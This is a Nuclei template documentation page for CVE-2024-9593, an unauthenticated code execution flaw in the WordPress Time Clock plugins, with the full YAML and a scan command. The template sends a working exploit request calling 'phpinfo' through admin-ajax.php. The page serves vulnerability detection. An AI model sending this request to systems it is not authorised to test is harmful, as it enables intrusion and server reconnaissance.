Skip to content
Nuclei Templates

Time Clock <= 1.2.2 & Time Clock Pro <= 1.1.4 - Remote Code Execution

ID: CVE-2024-9593

Severity: high

Author: s4e-io

Tags: cve,cve2024,time-clock,wp,wordpress,wp-plugin,rce,time-clock-pro

Description

Section titled “Description”

The Time Clock plugin and Time Clock Pro plugin for WordPress are vulnerable to Remote Code Execution in versions up to, and including, 1.2.2 (for Time Clock) and 1.1.4 (for Time Clock Pro) via the ‘etimeclockwp_load_function_callback’ function. This allows unauthenticated attackers to execute code on the server. The invoked function’s parameters cannot be specified.

YAML Source

Section titled “YAML Source”
id: CVE-2024-9593


info:
  name: Time Clock <= 1.2.2 & Time Clock Pro <= 1.1.4 - Remote Code Execution
  author: s4e-io
  severity: high
  description: |
    The Time Clock plugin and Time Clock Pro plugin for WordPress are vulnerable to Remote Code Execution in versions up to, and including, 1.2.2 (for Time Clock) and 1.1.4 (for Time Clock Pro) via the 'etimeclockwp_load_function_callback' function. This allows unauthenticated attackers to execute code on the server. The invoked function's parameters cannot be specified.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/detail/time-clock-122-unauthenticated-limited-remote-code-execution
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9593
    - https://github.com/RandomRobbieBF/CVE-2024-9593
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cve-id: CVE-2024-9593
    cwe-id: CWE-94
    epss-score: 0.00052
    epss-percentile: 0.21567
  metadata:
    max-request: 2
    verified: true
    vendor: scott_paterson
    product: time-clock & time-clock-pro
    framework: wordpress
    fofa-query: body="/wp-content/plugins/time-clock/" || body="/wp-content/plugins/time-clock-pro/"
  tags: cve,cve2024,time-clock,wp,wordpress,wp-plugin,rce,time-clock-pro


flow: http(1) && http(2)


http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "/wp-content/plugins/time-clock")'
          - 'status_code == 200'
        condition: and
        internal: true


  - raw:
      - |
        POST /wp-admin/admin-ajax.php?action=etimeclockwp_load_function HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        function=phpinfo


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "PHP Extension"
          - "PHP Version"
        condition: and


      - type: status
        status:
          - 200


    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - '>PHP Version <\/td><td class="v">([0-9.]+)'
# digest: 4a0a0047304502210094906ecb964d48fa5bc30c1f23e37a672e1cf87302bc5b237e5b30a894a0d2f202204e48586a7994b3d24a57ea55a95d5e585e2ab5349fd94ab05928e13b492e889d:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-9593.yaml"

View on Github